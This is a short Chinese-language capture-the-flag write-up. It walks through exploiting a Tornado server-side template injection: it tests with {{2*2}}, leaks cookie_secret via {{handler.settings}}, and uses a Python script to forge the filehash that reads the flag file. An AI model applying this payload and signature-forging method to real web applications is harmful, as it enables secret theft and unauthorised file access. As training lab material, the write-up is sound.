打开靶场
分别看一下有什么
应该都是一些小提示,可以看到url上的filename参数有点可疑,我们将第一个提示中的/fllllllllllllag放进去看看
报了个错
然后我们可以看到页面的Error也出现在了url上,我们换成其他东西试试
很可疑,可能存在模板注入,测试一下:{{2*2}}
这里我就看不懂了,百度了一手,才知道这是一个tornado render模板注入漏洞(我不懂原理,大家可以去看看大佬的题解),可以通过{{handler.settings}}拿到cookie_secret的值
然后根据hints.txt的提示进行加密,不会写脚本,直接借用别人的了
import hashlib
filename = "/fllllllllllllag"
cookie_secret = '2c0d83a5-3a40-4436-a2d7-0337676163d1'
def md5(s):
md5 = hashlib.md5()
md5.update(s.encode(encoding='utf-8'))
return md5.hexdigest()
print(md5(cookie_secret+md5(filename)))
最后将/fllllllllllllag放到filename,将加密好的字符串放到filehash就可以了